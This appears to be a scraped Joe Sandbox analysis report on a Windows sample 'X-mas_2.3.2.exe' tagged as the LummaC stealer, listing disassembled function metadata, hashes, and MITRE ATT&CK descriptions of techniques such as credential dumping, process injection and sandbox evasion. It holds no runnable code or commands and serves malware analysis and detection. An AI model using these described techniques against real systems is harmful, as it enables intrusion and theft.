Instruction Fuzzy Hash: A4414A71208B818BD725CF3CC884646BFA2AB56224F18869CD8E54F3EAD3B9D415C762

Function 00431FCB Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 100COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00431FD8
VariantInit.OLEAUT32 ref: 00431FE4

Strings

~, xrefs: 00432008
j, xrefs: 00432038
x, xrefs: 00432000
h, xrefs: 00432040
|, xrefs: 00432010
n, xrefs: 00432048
b, xrefs: 00432018
`, xrefs: 00432020
l, xrefs: 00432050
f, xrefs: 00432028
d, xrefs: 00432030

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: Variant$ClearInit
String ID: `$b$d$f$h$j$l$n$x$|$~
API String ID: 2610073882-2392625418
Opcode ID: 1ace8412bc45bfffb96bd3be78b6ed24615df238187204af6596b75391cea6f0
Instruction ID: d4354520380d8857094eb198d18f80dccd27335c0442324ae3d10dc815d509f5
Opcode Fuzzy Hash: 1ace8412bc45bfffb96bd3be78b6ed24615df238187204af6596b75391cea6f0
Instruction Fuzzy Hash: 7F413B70208B818FD725CF3CC894316BFE2AB56224F08869CE8E58F3D6C679D515C766

Function 0042D00D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0042D2C2

Strings

0, xrefs: 0042D25F
!, xrefs: 0042D2E4

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: FreeLibrary
String ID: !$0
API String ID: 3664257935-301933775
Opcode ID: a59b02c1f9b8175dae2b6d0af442bdd73a96467c1f50dfe658eb48a36293ef53
Instruction ID: 363f3f82d949639bcd6d0eea56e432ff8ce25dbbcf70693a7459fa4f30c8f00e
Opcode Fuzzy Hash: a59b02c1f9b8175dae2b6d0af442bdd73a96467c1f50dfe658eb48a36293ef53
Instruction Fuzzy Hash: 77816C31A083908AD728CF29944177FFFE2AFD6304F28466ED4D59B391C67C8945C75A

Function 0210D274 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0210D529

Strings

!, xrefs: 0210D54B
0, xrefs: 0210D4C6

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: !$0
API String ID: 3664257935-301933775
Opcode ID: 37f81d85b2bfb92f8fdad1cbb43a2ec662b080f2862e3bf310c2d9ea12420db1
Instruction ID: d79f46693e8b25c4887d7c5789e4b98d2398586dd6c9d23188996c3129e69664
Opcode Fuzzy Hash: 37f81d85b2bfb92f8fdad1cbb43a2ec662b080f2862e3bf310c2d9ea12420db1
Instruction Fuzzy Hash: 418159315483808BD72C8F28948176EFFE2DFD6208F18866DD8D69B7C1D7B88949C756

Function 02110351 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0211035D
VariantInit.OLEAUT32 ref: 0211036F

Strings

p=)u, xrefs: 0211036F

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: p=)u
API String ID: 2610073882-48304923
Opcode ID: 2e45656fdf5ffbe1593efbd581e097f3a262634558751425acb707cc8649274d
Instruction ID: 5ccfa1d89f1447a01c16100028f0094605fcc18a4545bccd39437222d6aa4a07
Opcode Fuzzy Hash: 2e45656fdf5ffbe1593efbd581e097f3a262634558751425acb707cc8649274d
Instruction Fuzzy Hash: A4516E61108F828ED335CB3C8949347BFE1AB5A224F588B5CD0E647BE6D774A106CB96

Function 021106DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 021106EE
VariantInit.OLEAUT32 ref: 02110700

Strings

p=)u, xrefs: 02110700

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: p=)u
API String ID: 2610073882-48304923
Opcode ID: 3d06b7d01c290f6fae5e8f27cb9f436f61c64d541d97039a441ac4b5b853a99c
Instruction ID: 842e2d7668142f1ea3b922a40c71104532bf94dd0cd4aca29cbaecc05f4c9811
Opcode Fuzzy Hash: 3d06b7d01c290f6fae5e8f27cb9f436f61c64d541d97039a441ac4b5b853a99c
Instruction Fuzzy Hash: 28516361508FC28ED335CB3C8948747BFE16B5A224F484B9CD0E787BD2D764A106C7A6

Function 0210E853 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0210E85F
VariantInit.OLEAUT32 ref: 0210E871

Strings

p=)u, xrefs: 0210E871

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: p=)u
API String ID: 2610073882-48304923
Opcode ID: d2a4920880c8dffef491f77d49b14847e4fc559ce1efdc54bc170197587b373e
Instruction ID: be3ac308cb6d3e9214c9a7415140433d2de018886dd1080946ea64469fc2eb56
Opcode Fuzzy Hash: d2a4920880c8dffef491f77d49b14847e4fc559ce1efdc54bc170197587b373e
Instruction Fuzzy Hash: 2C416731508F858ED326CB38C8897DABFE1AB56324F084A9CD2FA473D2C7746105C756

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report X-mas_2.3.2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_X-mas_2.3.2.exe_34b4a53e28eace8ff3cc67fe4cfe272cf25f5d_96f50eca_9bd85d15-ef6c-4f39-846f-990d223d2b43\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6233.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER636D.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER63BC.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
X-mas_2.3.2.exe

Function 00438860 Relevance: 32.2, APIs: 11, Strings: 7, Instructions: 666
memorycomCOMMON

Function 00419362 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 390
encryptionCOMMON

Function 00421060 Relevance: 14.3, Strings: 11, Instructions: 575
COMMON

Function 004229CD Relevance: 11.5, APIs: 3, Strings: 3, Instructions: 1008
COMMON

Function 004095A0 Relevance: 9.1, Strings: 7, Instructions: 320
COMMON

Function 00408640 Relevance: 7.7, APIs: 5, Instructions: 220
threadCOMMON

Function 0042BE8A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398
COMMON

Function 0042C26C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 337
COMMON

Function 0042C282 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 331
COMMON

Function 020E003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 0042B842 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
COMMON

Function 0042B840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre